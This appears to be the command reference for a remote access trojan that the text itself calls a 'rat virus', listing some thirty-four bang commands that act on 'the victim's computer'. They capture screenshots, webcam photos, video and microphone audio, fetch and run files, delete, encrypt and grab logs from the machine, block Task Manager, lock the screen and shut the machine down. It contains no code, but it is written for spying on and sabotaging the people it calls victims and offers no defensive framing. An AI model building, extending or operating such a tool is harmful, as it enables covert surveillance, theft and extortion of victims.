                                             commands available in session
========================================================================================================================
command = "!help"
using for: show a list of all available commands in preferences

========================================================================================================================
command = "!menu"
using for: return to the menu

========================================================================================================================
command = "!screenshot"
using to : do a screenshot and sent to you

========================================================================================================================
command = "!photoWebcam"
using to : do a photo from the webcam and sent to you

========================================================================================================================
command = "!openLink"
using to : open the link on the victim's computer

========================================================================================================================
command = "!directory"
using for: get a path to rat virus

========================================================================================================================
command = "!directoryContent"
using for: get all files name placed in the same directory with virus

========================================================================================================================
command = "!createFolder"
using for: create a folder on the victim's computer

========================================================================================================================
command = "!deleteFolder"
using for: delete a folder on the victim's computer

========================================================================================================================
command = "!deleteFile"
using for: delete a file on the victim's computer

========================================================================================================================
command = "!downloadFile"
using for: download the file to the victim's computer

========================================================================================================================
command = "!video"
using for: rec the video from the victim's webcam, duration in seconds

========================================================================================================================
command = "!audio"
using for: rec the audio from the victim's microphone, duration in seconds

========================================================================================================================
command = "!runFile"
using for: run the file on the victim's computer

========================================================================================================================
command = "!volume"
using for: change the volume on the victim's computer

========================================================================================================================
command = "!turnOff"
using for: shutdown the victim's computer

========================================================================================================================
command = "!restart"
using for: restart the victim's computer

========================================================================================================================
command = "!alt+f4"
using for: alt+f4 =)

========================================================================================================================
command = "!crazyCursor"
using for: change mouse buttons

========================================================================================================================
command = "!wallpaper"
using for: change the wallpaper on the victim's compute

========================================================================================================================
command = "!move"
using for: move the virus to the directory

========================================================================================================================
command = "!rename"
using for: rename the virus

========================================================================================================================
command = "!encrypt"
using for: encrypt file on the victim's computer

========================================================================================================================
command = "!decrypt"
using for: decrypt file on the victim's computer

========================================================================================================================
command = "!logs"
using for: grab and send logs from the victim's computer

========================================================================================================================
command = "!screamer"
using for: screamer :O

========================================================================================================================
command = "!moveFile"
using for: move the file to the directory on victim's computer

========================================================================================================================
command = "!lock"
using for: #winlock ('._.')

========================================================================================================================
command = "!downloadFolder"
using for: download folder to the victim's computer

========================================================================================================================
command = "!processes"
using for: show process list

========================================================================================================================
command = "!closeProces"
using for: close process

========================================================================================================================
command = "!banTM"
using for: ban task manager

========================================================================================================================
command = "!message"
using for: show text message

========================================================================================================================
command = "!CMDbomb"
using for: booom

========================================================================================================================